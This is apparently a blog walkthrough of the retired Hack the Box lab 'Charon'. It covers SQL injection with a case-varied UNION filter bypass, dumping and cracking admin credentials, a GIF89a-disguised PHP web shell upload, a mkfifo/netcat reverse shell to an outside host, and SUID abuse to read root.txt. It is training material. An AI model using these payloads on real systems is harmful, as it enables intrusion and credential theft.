Hello friends!! Today we are going to solve another CTF challenge “Charon” which is available online for those who want to increase their skill in penetration testing and black box testing. Charon is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.31 so let’s begin with nmap port enumeration.
PS C:\Users\jacco> nmap -sC -sV 10.10.10.31 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-10 17:01 W. Europe Standard Time Nmap scan report for 10.10.10.31 Host is up (0.028s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:c7:fb:a2:4b:53:1a:7a:f3:30:5e:b8:6e:ec:83:ee (RSA) | 256 97:e0:ba:96:17:d4:a1:bb:32:24:f4:e5:15:b4:8a:ec (ECDSA) |_ 256 e8:9e:0b:1c:e7:2d:b6:c9:68:46:7c:b3:32:ea:e9:ef (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Frozen Yogurt Shop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.97 seconds
As port 80 is running http server we open the target machine’s ip address in our browser.
We run dirbuster on port 80, which reveals a directory entitled “cmsdata/”.
We open the link, and are presented with a login page.
We don’t find anything on the login page, so we go to forgot password link.
We capture the request of the page using burpsuite, and send it to repeater.
After sending the request to repeater, we try to enumerate if the site is vulnerable to SQL-injection. As soon as we add a quote at the end of our email id we get a database error.
Now to confirm that it’s vulnerable to SQL-injection we use “-– – “to comment the query and remove the error.
Now as we know the site is vulnerable to SQL injection, we try to exploit it. First we find the number of columns, to check the number of columns we use “ORDER BY” command to find the number of columns in the table. After find the number of columns we use “UNION SELECT” command to give the output column names with the respective numbers. As UNION and union is blacklisted, we use UNion for SQL-injection.
email=puck@puckiestyle.nl’ UNion SELECT 1,2,3,4 — –
We couldn’t run any commands in columns, but when we pass a string in column 4, we successfully ran our query.
Now we know how bypass the security using string, we first find the name of the database
email=puck@puckiestyle.nl' UNion SELECT 1,2,3,concat(database(),"@puckiestyle.nl") -- -
After finding the name of the database we find the table name in the database.
email=puck@puckiestyle.nl' UNion select 1,2,3,concat(table_name, "@who.ami") FROM information_schema.tables where table_schema="supercms" limit 1,1 -- -
Enumerating the tables in the database; we find two tables, one called license and another one called operators.
1
|
‘ UNion select 1,2,3,concat(table_name, “@who.ami”) FROM information_schema.tables where table_schema=“supercms” limit 2,1 — –
|
After getting the names of the tables, we enumerate the columns. The license table doesn’t have any interesting columns but in the “operators” table we find a column called “__username_”.
1
|
‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=“operators” limit 1,1 — –
|
After getting the “__username_” column we enumerate further and get a column called “__password_”.
1
|
‘ UNion select 1,2,3,concat(column_name, “@who.ami”) FROM information_schema.columns where table_name=“operators” limit 2,1 — –
|
Now we dump the column name “__username_”.
1
|
‘ UNion select 1,2,3,concat(__username_, “@who.ami”) FROM operators limit 1,1 — –
|
Now we dump the column name “__password_” for the username = “super_cms_adm”.
' UNion select 1,2,3,concat(__password_, "@who.ami") FROM operators limit 1,1 -- -
When we dump the “__password_” column we get a hash. 0b0689ba94f94533400f4decd87fa260 We use hashkiller.co.uk to crack the password.
Now we got the credentials for the supercms login page, super_cms_adm:tamarro.
Now login using the above credentials, we were able to get a page where there is an option for uploading image.
Now we open the link and find an upload page.
We take a look at the source page and find a base64 encoded string.
When we decode it we find a string called “testfile1”. It is possible that there is hidden field with this name.
By adding a new input field to the form named testfile1 and setting the value to writeup.php, it will cause the page to rename the uploaded file to the value specified.
Bypassing the image upload is trivial. Simply put GIF89a; as the first line in the file and save the file with a .gif extension, and it will pass all checks. The remainder of the file can include any PHP script.
puck.php.gif
|
GIF89a
<?php echo system($_REQUEST[‘puck’]); ?> |
We capture the upload request and Respons with Burp and change response & request to post create a new field and add “puck.php”.
Now we get the link the location of the file we just uploaded in /images/.
Before running our shell, we setup our listener using netcat, As soon as we open the link to our shell,
http://10.10.10.31/images/puck.php?puck=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 443 >/tmp/f
we get our reverse shell.
Now enumerating through the system we find an encrytpted file and a public key inside /home/decoder directory.
We download both the files into our system.
1
2
|
meterpreter > download decoder.pub /root/Desktop
meterpreter > download pass.crypt /root/Desktop
|
Now we decode the encrypted file using public key with the RsaCtfTool.
1
|
./RsaCtfTool.py —publickey /root/Desktop/decoder.pub –uncipherfile /root/Desktop/pass.crypt
|
We use ssh to login using the credentials, decoder:nevermindthebollocks.
1
|
ssh decoder@10.10.10.31
|
After logging in we find a file called user.txt, we open the file and find our first flag.
Now we find the files with SUID bit set and find a file called supershell in /usr/local/bin/ directory.
1
|
find / –perm –4000 2>/dev/null
|
When we run the binary we find that we can run any shell command using this binary. We use this to open root.txt inside /root/ directory. When we open root.txt we find our final flag.
1
2
|
supershell “/bin/ls$
> cat /root/root.txt”
|
Author: Sayantan Bera